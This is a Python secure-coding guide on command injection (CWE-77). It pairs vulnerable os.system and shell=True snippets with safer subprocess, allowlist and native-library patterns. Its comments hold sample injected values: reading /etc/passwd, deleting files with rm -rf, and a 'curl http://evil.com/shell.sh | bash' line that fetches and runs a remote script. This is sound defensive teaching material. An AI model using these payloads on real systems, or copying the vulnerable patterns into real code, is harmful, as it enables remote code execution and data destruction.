CWE-77: Command Injection - Python
Overview
Command injection in Python occurs when applications construct system commands using untrusted input. Python's subprocess and os modules can invoke shells, allowing attackers to inject malicious commands.
Primary Defence: Use subprocess.run() or subprocess.Popen() with argument lists instead of shell strings (shell=False), never use os.system() or subprocess.call() with shell=True on untrusted input, validate all user input against strict allowlists before using in commands, and use Python libraries for specific tasks instead of shelling out to prevent command injection attacks.
Common Vulnerable Patterns
os.system() with User Input
# VULNERABLE - Always uses shell
import os
ip_address = request.GET.get('ip')
os.system('ping -c 4 ' + ip_address)
# Attack: ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd
subprocess with shell=True
# VULNERABLE - Shell interpretation enabled
import subprocess
filename = request.POST.get('file')
subprocess.call('ls -la ' + filename, shell=True)
# Attack: file=test.txt && rm -rf /tmp/*
# Executes: ls -la test.txt && rm -rf /tmp/*
os.popen() with Concatenation
# VULNERABLE - Uses shell automatically
import os
domain = request.args.get('domain')
result = os.popen('nslookup ' + domain).read()
# Attack: domain=example.com || whoami
# Executes: nslookup example.com || whoami
String Formatting in Commands
# VULNERABLE - f-string in shell command
import subprocess
host = request.json.get('host')
subprocess.run(f'ping -c 4 {host}', shell=True)
# Attack: host=8.8.8.8; curl http://evil.com/shell.sh | bash
Secure Patterns
Use Python Native Libraries (Primary Defense)
# SECURE - Use Python libraries instead of system commands
# Instead of: os.system('ping ' + host)
import socket
import subprocess
def is_host_reachable(hostname):
"""Check host reachability using native Python"""
# Validate hostname
if not hostname.replace('.', '').replace('-', '').isalnum():
raise ValueError("Invalid hostname")
try:
socket.gethostbyname(hostname)
return True
except socket.error:
return False
# Instead of: os.system('rm ' + file)
import os
import re
def delete_file(filename):
"""Delete file using Python's os module"""
# Validate filename
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
raise ValueError("Invalid filename")
filepath = os.path.join('/safe/directory', filename)
os.remove(filepath)
# Instead of: subprocess.call('curl ' + url, shell=True)
import requests
def fetch_url(url):
"""Fetch URL using requests library"""
response = requests.get(url, timeout=10)
return response.text
# Instead of: os.system('tar -czf archive.tar.gz ' + files)
import tarfile
def create_archive(file_list, archive_name):
"""Create tar archive using tarfile module"""
with tarfile.open(archive_name, 'w:gz') as tar:
for file in file_list:
# Validate each filename
if not re.match(r'^[a-zA-Z0-9_./-]+$', file):
continue
tar.add(file)
Why this works:
- Native libraries eliminate shell:
socket.gethostbyname()uses system resolvers (notnslookup),os.remove()uses syscalls (notrm),requests.get()uses sockets (notcurl),tarfile.open()uses zlib (nottar) - Removes attack surface: No shell interpretation means metacharacters (
;,&,|, backticks,$(), newlines) have no special meaning - Defense-in-depth validation: Regex
^[a-zA-Z0-9.-]+$blocks command separators and path traversal even though native libraries don't interpret them - Path safety:
os.path.join()combines trusted base with user input, preventing absolute paths (/etc/passwd) and traversal (../../etc/shadow) - Standard library advantages: Maintained, cross-platform, auditable modules avoid inconsistent shell escaping (bash/sh/dash/zsh) and OS-specific command syntax
subprocess.run() with List Arguments
# SECURE - Use list form, shell=False (default)
import subprocess
import re
def secure_ping(ip_address):
"""Execute ping with argument list"""
# Validate IP address
ip_pattern = r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' \
r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
if not re.match(ip_pattern, ip_address):
raise ValueError("Invalid IP address")
# Use list form - no shell interpretation
result = subprocess.run(
['ping', '-c', '4', ip_address],
capture_output=True,
text=True,
timeout=10
)
return result.stdout
def secure_nslookup(domain):
"""Execute nslookup with argument list"""
# Validate domain name
if not re.match(r'^[a-zA-Z0-9.-]+$', domain):
raise ValueError("Invalid domain name")
# Arguments as list, shell=False
result = subprocess.run(
['nslookup', domain],
capture_output=True,
text=True,
timeout=5
)
return result.stdout
Why this works:
subprocess.run()with list bypasses shell: Arguments passed as distinct elements, not shell scriptshell=Falseprevents shell invocation: Directfork()/exec()(Linux) orCreateProcess()(Windows)- Metacharacters become literal data:
;,&,|,$(), backticks passed as strings, not interpreted - Strict validation blocks injection attempts: IP/domain regex ensures only valid input passes
capture_output=Trueavoids shell redirection: Clean stdout/stderr capture without>,2>&1- Timeout prevents DoS: Stops slow-resolving domains or infinite loops after 10 seconds
Input Validation with Regex
# SECURE - Strict allowlist validation
import re
class InputValidator:
"""Validate user inputs against allowlists"""
HOSTNAME_PATTERN = re.compile(r'^[a-zA-Z0-9.-]+$')
IP_PATTERN = re.compile(
r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
)
FILENAME_PATTERN = re.compile(r'^[a-zA-Z0-9_.-]+$')
NUMBER_PATTERN = re.compile(r'^[0-9]+$')
@staticmethod
def validate_hostname(hostname):
if not hostname or len(hostname) > 253:
raise ValueError("Invalid hostname length")
if not InputValidator.HOSTNAME_PATTERN.match(hostname):
raise ValueError("Invalid hostname format")
return hostname
@staticmethod
def validate_ip(ip_address):
if not InputValidator.IP_PATTERN.match(ip_address):
raise ValueError("Invalid IP address format")
return ip_address
@staticmethod
def validate_filename(filename):
if not filename:
raise ValueError("Empty filename")
if '..' in filename or '/' in filename or '\\' in filename:
raise ValueError("Path traversal attempt detected")
if not InputValidator.FILENAME_PATTERN.match(filename):
raise ValueError("Invalid filename format")
return filename
@staticmethod
def validate_number(value):
if not InputValidator.NUMBER_PATTERN.match(str(value)):
raise ValueError("Invalid number format")
return int(value)
Why this works:
- Centralized validation: Compiled
re.compile()patterns (thread-safe, performant) ensure consistency - all code paths enforcing same strict rules - Allowlist regex:
^[a-zA-Z0-9.-]+$blocks shell metacharacters (;,&,|,>,<, backticks,$(), newlines, null bytes) by only permitting safe chars - Specific checks: IP validation (precise IPv4 octets 0-255), path traversal detection (
'..',/,\\), length limits (≤253 per RFC 1035) prevent injections and DoS - Fail-closed exceptions:
raise ValueErrorfor invalid input rejects suspicious data rather than sanitizing (error-prone);int()conversion ensures type safety - Defense-in-depth: Complements list-based subprocess - validation catches malicious input before command execution even if subprocess used correctly
Safe Subprocess Execution Pattern
# SECURE - Complete safe execution pattern
import subprocess
import shlex
from pathlib import Path
def execute_command_safely(command, args):
"""
Execute command with strict safety controls
Args:
command: Command name (validated against allowlist)
args: List of arguments (each validated)
"""
# Allowlist of permitted commands
ALLOWED_COMMANDS = {
'ping': '/bin/ping',
'nslookup': '/usr/bin/nslookup',
'dig': '/usr/bin/dig'
}
if command not in ALLOWED_COMMANDS:
raise ValueError(f"Command not allowed: {command}")
# Build command with full path
cmd_list = [ALLOWED_COMMANDS[command]] + args
# Execute without shell
try:
result = subprocess.run(
cmd_list,
capture_output=True,
text=True,
timeout=30,
check=False, # Don't raise on non-zero exit
shell=False # CRITICAL: Never use shell
)
return result.stdout
except subprocess.TimeoutExpired:
raise RuntimeError("Command timed out")
except Exception as e:
raise RuntimeError(f"Command execution failed: {e}")
Why this works:
- Command allowlist:
ALLOWED_COMMANDSdictionary with absolute paths (/bin/ping,/usr/bin/nslookup) prevents PATH manipulation and arbitrary command execution - List-based arguments:
cmd_list = [ALLOWED_COMMANDS[command]] + argspasses each arg separately - no shell interpretation, quoting, or escaping needed - Direct execution:
shell=Falseinvokes executables directly viafork()/exec(), not through/bin/sh -c;capture_output=Truecaptures stdout/stderr without redirection - DoS prevention:
timeout=30prevents hangs from unresponsive hosts;check=Falseallows graceful handling of non-zero exit codes - Defense-in-depth wrapper: Combines allowlisting, argument isolation, timeouts, and clean error messages in reusable function
Common Python Command Injection Scenarios
File Operations
# VULNERABLE
import os
filename = request.POST.get('file')
os.system(f'cat {filename}')
# SECURE - Use built-in file operations
def read_file_safely(filename):
# Validate filename
filename = InputValidator.validate_filename(filename)
# Use Path for safe file operations
safe_dir = Path('/safe/directory')
file_path = safe_dir / filename
# Ensure file is within safe directory
if not file_path.resolve().is_relative_to(safe_dir.resolve()):
raise ValueError("Path traversal attempt")
with open(file_path, 'r') as f:
return f.read()
Network Operations
# VULNERABLE
import os
host = request.args.get('host')
os.system(f'curl https://{host}/api/data')
# SECURE - Use requests library
import requests
def fetch_api_data(hostname):
# Validate hostname
hostname = InputValidator.validate_hostname(hostname)
# Use requests library
url = f'https://{hostname}/api/data'
response = requests.get(url, timeout=10)
response.raise_for_status()
return response.json()
Image Processing
# VULNERABLE
import os
image_file = request.FILES.get('image').name
os.system(f'convert {image_file} thumbnail.jpg')
# SECURE - Use Pillow library
from PIL import Image
def create_thumbnail(image_path):
# Validate filename
filename = InputValidator.validate_filename(image_path)
# Use Pillow instead of ImageMagick command
with Image.open(filename) as img:
img.thumbnail((128, 128))
img.save('thumbnail.jpg')
Archive Creation
# VULNERABLE
import os
files = request.POST.get('files')
os.system(f'zip archive.zip {files}')
# SECURE - Use zipfile module
import zipfile
def create_zip_archive(file_list):
with zipfile.ZipFile('archive.zip', 'w') as zipf:
for file in file_list:
# Validate each filename
safe_name = InputValidator.validate_filename(file)
zipf.write(safe_name)
Django-Specific Guidance
# Django view with command injection vulnerability
from django.http import HttpResponse
import subprocess
def vulnerable_view(request):
# VULNERABLE
domain = request.GET.get('domain', '')
result = subprocess.check_output(f'nslookup {domain}', shell=True)
return HttpResponse(result)
# SECURE Django view
from django.http import HttpResponse, HttpResponseBadRequest
import subprocess
def secure_view(request):
domain = request.GET.get('domain', '')
# Validate input
try:
domain = InputValidator.validate_hostname(domain)
except ValueError as e:
return HttpResponseBadRequest(str(e))
# Use list form, no shell
try:
result = subprocess.run(
['nslookup', domain],
capture_output=True,
text=True,
timeout=5
)
return HttpResponse(result.stdout)
except subprocess.TimeoutExpired:
return HttpResponseBadRequest("Request timeout")
Flask-Specific Guidance
# Flask route with command injection vulnerability
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/ping')
def vulnerable_ping():
# VULNERABLE
ip = request.args.get('ip')
result = os.popen(f'ping -c 4 {ip}').read()
return result
# SECURE Flask route
from flask import Flask, request, abort
import subprocess
@app.route('/ping')
def secure_ping():
ip = request.args.get('ip', '')
# Validate IP address
try:
ip = InputValidator.validate_ip(ip)
except ValueError:
abort(400, "Invalid IP address")
# Use subprocess with list arguments
try:
result = subprocess.run(
['ping', '-c', '4', ip],
capture_output=True,
text=True,
timeout=10
)
return result.stdout
except subprocess.TimeoutExpired:
abort(504, "Request timeout")
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
Additional Resources
- Bandit Security Linter - Detects subprocess issues
- CWE-77: Command Injection
- OWASP Command Injection
- Python subprocess Documentation